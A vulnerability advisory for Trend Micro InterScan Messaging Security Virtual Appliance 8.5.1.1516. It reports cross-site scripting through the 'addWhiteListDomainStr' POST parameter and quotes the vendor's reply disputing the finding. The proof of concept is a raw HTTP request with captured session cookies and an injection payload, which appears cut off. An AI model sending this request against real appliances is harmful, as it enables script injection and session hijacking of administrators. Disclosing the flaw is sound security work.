I. VULNERABILITY ------------------------- XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance 8.5.1.1516 II. DESCRIPTION ------------------------- Has been detected a XSS vulnerability in InterScan Messaging Security Virtual Appliance version 8.5.1.1516. The code injection is done through the parameter "addWhiteListDomainStr" send via post in the page “/addWhiteListDomain.imss” III. PROOF OF CONCEPT ------------------------- The application does not validate the parameter “addWhiteListDomainStr” correctly. https://10.200.210.100:8445/addWhiteListDomain.imss Host=10.200.210.100:8445 User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0 Accept=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Referer= https://186.230.33.160/trend-interscan/trend.php Cookie=JSESSIONID=68D4F0AEF4874173BDE77FAA4895231F; CurrentLocale=en- US; PHPSESSID=2ok068gfak8np5isbe5k5l4nf3; un=7164ceee6266e893181da6c33936e4a4; userID=1; LANG=en; wids=modImsvaSystemUseageWidget,modImsvaMailsQueueWidget,modImsvaQuara ntineWidget,modImsvaArchiveWidget,; lastID=15; theme=default; lastTab=1; GetPageTab=1 Connection=keep-alive Content-Type=application/x-www-form-urlencoded Content-Length=95 POSTDATA=addWhiteListDomainStr=aaaa.com">) https://vimeo.com/96757096 IV. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or script code in a targeted user's browser, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser allowing session hijacking. V. SYSTEMS AFFECTED ------------------------- Tested in InterScan Messaging Security Virtual Appliance 8.5.1.1516 VI. SOLUTION ------------------------ Answer from Trend. Hi William, According to our Product Developers, this is not vulnerability of our product. All of the cookies(not just IMSVA) can be stolen from a compromised environment. It was highly suggested that you upgrade your client to ensure safety. Also, they recommended another Trend Micro Product -"OfficeScan" that may be suitable for your environment. I hope this information helps. Please let me know if you have additional questions or clarifications. Have a great day! By William Costa